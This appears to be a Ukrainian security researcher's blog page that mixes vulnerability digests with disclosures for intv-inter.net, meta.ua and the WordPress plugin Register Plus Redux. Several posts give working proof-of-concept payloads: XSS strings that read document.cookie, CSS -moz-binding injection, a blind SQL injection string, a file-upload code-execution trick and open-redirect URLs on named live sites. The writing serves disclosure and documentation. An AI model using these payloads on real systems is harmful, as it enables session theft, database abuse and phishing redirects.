Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Security Notice for CA SiteMinder (деталі)
• Chezola Systems (display-section.php?id) Remote SQL injection Vulnerability (деталі)
• EasyContent CMS (participant.php?id) Remote SQL injection Vulnerability (деталі)
• NetSaro Enterprise Messenger Server Plaintext Password Storage Vulnerability (деталі)
• Multiple cross-site request forgery (CSRF) vulnerabilities in SquirrelMail (деталі)
• CRLF injection vulnerability in SquirrelMail (деталі)
• NetSaro Enterprise Messenger Server Administration Console Weak Cryptographic Password Storage Vulnerability (деталі)
• Cross-site scripting (XSS) vulnerability in Adobe RoboHelp and RoboHelp Server (деталі)
• Cross-site scripting (XSS) vulnerability in SquirrelMail (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail (деталі)

05.06.2009

У вересні, 21.09.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://intv-inter.net. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на intv-inter.net.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.01.2012

Insufficient Anti-automation:

Вразлива капча на сторінках сайта (http://intv-inter.net/tv/channel/intv/).

XSS (IE):

http://intv-inter.net/login/?redirect='style=xss:expression(alert(document.cookie))%20

Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).

В даній добірці уразливості в веб додатках:

• Vulnerabilities in Siemens Automation License Manager (деталі)
• Avant-Garde Technologies (display-section.php?id) Remote SQL injection Vulnerability (деталі)
• Liberating IT (picture.php?gid) Remote SQL injection Vulnerability (деталі)
• Vulnerabilities in Siemens SIMATIC WinCC flexible 2008 SP2 (деталі)
• Amigot Corp (story.php?id) Remote SQL injection Vulnerability (деталі)
• Vulnerabilities in Serv-U 11.1.0.3 (деталі)
• 6House Design (product_details.php?id) Remote SQL injection Vulnerability (деталі)
• Webdesigns-studio (sysMsg.php?errMsg) Cross Site Scripting Vulnerabilities (деталі)
• Mybb Change Password Vulnerability (деталі)
• Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Skysa App Bar, 1 jquery photo gallery slideshow flash та Flash album gallery. Для котрих з’явилися експлоіти. Skysa App Bar - це плагін для розширення сайту за рахунок розміщення веб додатків на панелі, 1 jquery photo gallery slideshow flash - це плагін для створення фотогалереї, Flash album gallery - це також плагін для створення фотогалереї.

• Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress 1-jquery-photo-gallery-slideshow-flash plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

01.12.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це друга з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2011

Persistent XSS:

На сторінці http://site/wp-admin/options-general.php ?page=register-plus-redux є наступні уразливості.

В полях: Email Verification, Admin Verification, User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification), Custom Register CSS, Custom Login CSS:
</textarea><script>alert(document.cookie)</script>
Код спрацює на сторінці http://site/wp-admin/options-general.php?page=register-plus-redux, а у випадку полей Email Verification і Admin Verification ще спрацює на сторінці http://site/wp-login.php?checkemail=registered.

Якщо вказати код в полях Custom Register CSS, Custom Login CSS:

body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

То код відповідно спрацює на сторінках http://site/wp-login.php?action=register та http://site/wp-login.php. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Якщо вказати код в полі Minimum password length (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1
То код спрацює на сторінці http://site1/wp-login.php?action=register.

Якщо вказати код в полях Empty, Short, Bad, Good, Strong, Mismatch (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
"};alert(document.cookie);/*
То код спрацює на сторінці http://site/wp-login.php?action=register.

Якщо вказати код в полі Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
То код спрацює на сторінці http://site/wp-login.php?action=register. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Strictly Social XSS persistent:

У вищезгаданих полях User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification) окрім XSS в самому полі, є ще XSS через візуалізацію (що відбувається через jQuery), і відповідно при відправці POST запиту код спрацює двічі, й виправляти кожну з цих уразливостей потрібно в двох місцях (бо навіть заескейпчений html-код виконається). Також, окрім атаки через відправку POST запиту, можна провести XSS атаку через візуалізацію в цих трьох полях, а також в девяти інших полях (From Email, From Name, Subject в Custom New User Message, в Custom Verification Message та в Custom Admin Notification) при вставці XSS коду в поле.

Тобто потрібно обманним чином змусити жертву вставити код в одне з цих дванадцяти полів, при цьому код можна занести жертві в буфер через атаку через буфер обміну. Дані уразливості - це Strictly social XSS.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі). Як і в попередніх версіях плагіну.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

Продовжу тему Wi-Fi точок доступа після D-Link DAP 1150. Сьогодні я дослідив пристрій Belkin Surf N150 Wireless N Router, що являє собою Wi-Fi Access Point та Router. І попередній аналіз цього пристовую показав, що в ньому мають місце Predictable Resource Location, Brute Force та Cross-Site Request Forgery уразливості. Такі ж уразливості, що і в D-Link DAP 1150, та в ADSL роутерах D-Link DSL-500T та Iskra Callisto 821+.

Цей пристрій лежав в мене ще з початку грудня, лише сьогодні до нього дістався. Але при дослідженні виявилося, що пристрій глючний (немає доступу до адмінки, ні по даним вказаним в документації, ні по даним доступним в Інтернеті). Тому майже нічого перевірити не вдалося і поки що лише опосередковано (по документації пристрою) можу судити по наявності в нього даних уразливостей. Які є типовими для всіх мережевих пристроїв.

Коли вдаться вирішити проблеми з глюками цього пристрою, я оприлюдню більш детальну інформацію про його уразливості - в цьому записі та нових записах про уразливості в Belkin Surf N150. При цьому зазначу, що Windows-додаток для налаштувань пристрою, який постачається на CD, використовує спеціальний захисний підхід до проведення конфігурації девайся, що убезпечує його від локальних атак.

Подібне я зустрів вперше і на мережевих пристроях інших виробників такого я не зустрічав. Тому пристрій Belkin виглядає більш безпечним порівняно з іншими точками доступа (але я планую ще перевірити чи використовується цей підхід в панелі керування).

В даній добірці уразливості в веб додатках:

• Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default (деталі)
• SQL injection in Social Slider (деталі)
• XWeavers (page.asp?id) Remote SQL injection Vulnerability (деталі)
• Software Center vulnerability (деталі)
• Synchrony Infotech (product_details.php?id) Remote SQL injection Vulnerability (деталі)
• Kimia Remote SQL injection Vulnerability (деталі)
• Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability (деталі)
• Remot File Include In Aardvark Topsites PHP 5 (деталі)
• Remot File Include In Shop-SCRIPT FREE (деталі)
• Remot File Include In SLAED CMS 2 (деталі)

30.11.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це перша з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting, SQL Injection, Code Execution та Full path disclosure уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

29.12.2011

XSS:

POST запит на сторінці http://site/wp-login.php?action=register
</textarea><script>alert(document.cookie)</script>В полі: About Yourself.

Використовуючи функцію Autocomplete URL можна провести атаку через GET:

http://site/wp-login.php?action=register&description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Всі атаки на persistent XSS та persistent SQL Injection уразливості на сторінці конфігурації плагіна можуть проводитися через reflected XSS уразливості з метою обходу захисту від CSRF-атак.

Persistent XSS:

При включенні в налаштуваннях плагіна опції Show Invitation Code Tracking widget on Dashboard та додання коду запрошення (Add a new invitation code), можна вказати JS/VBS код.
<script>alert(document.cookie)</script>
Який спрацює на сторінці Dashboard (http://site/wp-admin/index.php). Це дефолтна сторінка, на яку заходять адмін та користувачі сайта при аутентифікації.

Persistent SQL Injection:

При включенні в налаштуваннях плагіна опції Show Invitation Code Tracking widget on Dashboard та додання коду запрошення (Add a new invitation code), можна вказати код для SQL ін’єкції.
' and benchmark(1000000,md5(now())) and 1='1Який спрацює при відвідуванні сторінки Dashboard (http://site/wp-admin/index.php). Це Persistent Blind SQL Injection.

Code Execution:

Маючи доступ до налаштувань плагіна, можна провести Code Execution через аплоаідінг 1.phtml.jpg. Це залежить від версії движка, про що я писав в записі Виконання коду в WordPress 2.5 - 3.1.1. Дана атака спрацює в версіях движка до WordPress 3.1.3, де розробники виправили функціонал аплоадінга (що використовується плагіном).

Full path disclosure:

http://site/wp-content/plugins/register-plus-redux/register-plus-redux.php

В register-plus-redux.php є FPD як і в попередніх версіях. А файл dash_widget.php (з FPD) перероблений на dashboard_invitation_tracking_widget.php, в якому вже немає FPD.

Так само як і виправлена FPD при POST запиті на сторінці http://site/wp-login.php?action=register. Але спеціальним чином її можна відновити.

При доданні нового поля в Additional Fields і при вказанні 1 (або майже будь-якого значення) в полі Options та включенні опції Show on Registration, з’явиться FPD при POST запиті на сторінці http://site/wp-login.php?action=register.

Також можна додати на сайт ще дві FPD уразливості. Якщо вказати Custom Logo URL адресу не до файла зображення або просто “http://”, то буде виводиться повідомлення про помилку з FPD на сторінках http://site/wp-admin/options-general.php ?page=register-plus-redux і http://site/wp-login.php?action=register.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

Ще 30.06.2007 я знайшов Redirector уразливості (а 31.07.2009 додатково виявив Cross-Site Scripting уразливості) на сайті http://meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.

Останнього разу стосовно проектів компанії Мета я писав про уразливості на img.meta.ua.

XSS (Strictly social XSS):

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

XSS:

• alert(document.cookie)

Redirector (URL Redirector Abuse):

http://meta.ua/jmp.asp?http://websecurity.com.ua

http://meta.ua/nav.asp?http://websecurity.com.ua

http://meta.ua/adclick.asp?href=http://websecurity.com.ua

http://meta.ua/c.asp?href=http://websecurity.com.ua

Про ці редиректори я вже писав в 2007 році.

Дані уразливості так досі й висять на сайті, як це було до того, як я знайшов їх у червні 2007 року (тобто на протязі всього часу роботи цього сайта). І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.

В даній добірці уразливості в веб додатках:

• Hewlett-Packard Data Protector DtbClsLogin Utf8cpy Remote Code Execution Vulnerability (деталі)
• phpMyAdmin 3.x Conditional Session Manipulation (деталі)
• phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability (деталі)
• HP Data Protector Express and HP Data Protector Express Single Server Edition (SSE), Local Denial of Service (DoS), Execution of Arbitrary Code (деталі)
• Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities (деталі)
• Multiple XSS in HESK (деталі)
• HP Data Protector Express and HP Data Protector Express Single Server Edition (SSE), Local Denial of Service (DoS), Execution of Arbitrary Code (деталі)
• Eve-NukePortal file include (phpbb_root_path) (деталі)
• MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability (деталі)
• codebb 1.1b3 (phpbb_root_path) Remote File Include Vulnerability (деталі)